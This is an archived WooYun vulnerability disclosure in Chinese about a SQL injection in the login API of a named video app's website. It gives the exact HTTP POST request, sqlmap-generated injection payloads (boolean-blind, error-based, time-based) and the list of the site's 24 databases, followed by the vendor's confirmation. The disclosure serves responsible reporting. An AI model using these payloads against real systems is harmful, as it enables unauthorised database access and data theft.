乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-18: 细节已通知厂商并且等待厂商处理中 2015-05-18: 厂商已经确认,细节仅向厂商公开 2015-05-28: 细节向核心白帽子及相关领域专家公开 2015-06-07: 细节向普通白帽子公开 2015-06-17: 细节向实习白帽子公开 2015-07-02: 细节向公众公开
*
光息谷 为云视旗下APP登录处存在POST注入抓包获取数据
POST /e/extend/new_client_api/login.php HTTP/1.1Host: www.hktv.tvProxy-Connection: keep-aliveAccept-Encoding: gzipContent-Type: application/x-www-form-urlencoded; charset=utf-8Content-Length: 29Connection: keep-aliveUser-Agent: å æ¯è°· 2.9 (iPhone; iPhone OS 8.3; zh_CN)loginname=11111&password=dddd
证明:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: loginname Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: loginname=-3492' OR (1250=1250)#&password=qq Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: loginname=111' AND (SELECT 5229 FROM(SELECT COUNT(*),CONCAT(0x3a666d723a,(SELECT (CASE WHEN (5229=5229) THEN 1 ELSE 0 END)),0x3a6b71653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'msMy'='msMy&password=qq Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: loginname=111' AND 6592=BENCHMARK(5000000,MD5(0x4d655476)) AND 'pVCW'='pVCW&password=qq---[17:06:06] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.23back-end DBMS: MySQL 5.0[17:06:06] [INFO] fetched data logged to text files under 'D:\sqlmap\output\www.hktv.tv'[*] shutting down at 17:06:06
数据库信息:
available databases [24]:[*] bbs_hktv[*] cdp[*] cms_as[*] cms_hktv[*] information_schema[*] jsbc-security[*] meicam[*] mysql[*] odp[*] onairfastedit[*] onairtranscode[*] ors[*] performance_schema[*] security_as[*] security_hktv[*] security_hn[*] vms[*] vms_as[*] vms_hktv[*] vms_jyg[*] vms_sjs[*] wechat_hn[*] wechat_sjs[*] yicloud_aliyun_rds_dummy_database
危害等级:高
漏洞Rank:20
确认时间:2015-05-18 17:25
谢谢关注,我们会尽快修复
暂无